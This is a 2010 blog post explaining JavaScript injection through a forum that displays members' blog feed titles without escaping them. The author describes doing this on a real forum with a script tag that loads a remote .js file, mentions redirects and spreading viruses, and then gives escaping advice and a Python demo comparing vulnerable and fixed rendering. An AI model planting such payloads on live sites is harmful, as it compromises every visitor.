What is JavaScript Injection?

by kalai 2010-02-01 12:03:44

JavaScript injection is a site exploit that enables you to inject JavaScript snippets into the victim site’s web pages, so that they run for whoever visits the page that has been manipulated. Usually it is not site-wide, but it can trick visitors and servers in a few ways, such as stealthily changing form submission variable values, restructuring the page DOM, adding HTML elements and messing with the CSS styles.
The security bug that enables javascript injection

In the forum, every post serves the member's blog feed via a tiny line under the member name, displaying the title of the newest entry. Because of a bug that does not convert essential HTML reserved characters such as < and > to HTML entities but leaves them as the real characters, I am able to inject HTML code into every page I have posts in.

This is going to be fun <script type="text/javascript" src="http://yourdomain.com/jsfun.js">

After entering the feed address of this blog, all forum pages with my posts start picking up this feed, including the newest entry title with the injection line in it. This simple line of HTML runs shawn.js located at http://7.charmhtml.com on that particular DP forum page. Each and every visitor coming to that page will spot the funny little new Shawn logo I’ve replaced the old DP forum one with.
What more can I do with an injection

On top of all these, you can redirect visitors to another site, put up your own banner ads, trigger a popup window and even spread viruses.
How to prevent it

The essential step in securing your site against any JavaScript injection is to make sure you filter all illegal characters from user input, not only from explicitly typed and submitted data but also from other channels of user input, such as, in this case, the user's blog feed.
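As an added example (not the forum's own code), here is the feed-title line rendered two ways: the buggy pattern that drops the newest entry title into the page unchanged, and the fixed version that encodes the reserved characters first. The RSS feed, the member name and the script host (example.invalid) are constructed for the demonstration.

```python
import html
import xml.etree.ElementTree as ET

# Constructed sample feed: the newest entry title carries a <script> tag,
# the same trick described above (example.invalid is a placeholder host).
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>member blog</title>
<item><title>This is going to be fun &lt;script src="http://example.invalid/x.js"&gt;&lt;/script&gt;</title></item>
<item><title>Older, harmless entry</title></item>
</channel></rss>"""


def newest_entry_title(feed_xml: str) -> str:
    """Return the title of the first <item>, which RSS readers treat as newest.
    The XML parser already decodes &lt; and &gt;, so the result holds real < and >."""
    root = ET.fromstring(feed_xml)
    item = root.find("./channel/item")
    return item.findtext("title", default="") if item is not None else ""


def render_vulnerable(member: str, title: str) -> str:
    """The bug: the untrusted title is concatenated into the HTML as-is,
    so any tag inside it becomes part of the page."""
    return f'<div class="member">{member} <small>{title}</small></div>'


def render_escaped(member: str, title: str) -> str:
    """The fix: encode < > & and quotes so the title is displayed as text."""
    return (f'<div class="member">{html.escape(member)} '
            f'<small>{html.escape(title)}</small></div>')


def carries_script_tag(rendered: str) -> bool:
    """Simple check for a raw <script tag surviving into the rendered line."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    title = newest_entry_title(SAMPLE_FEED)
    print("vulnerable:", render_vulnerable("kalai", title))
    print("escaped:   ", render_escaped("kalai", title))
```

Running it shows the escaped line contains `&lt;script` rather than a live tag, which is the difference between showing the title and executing it.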
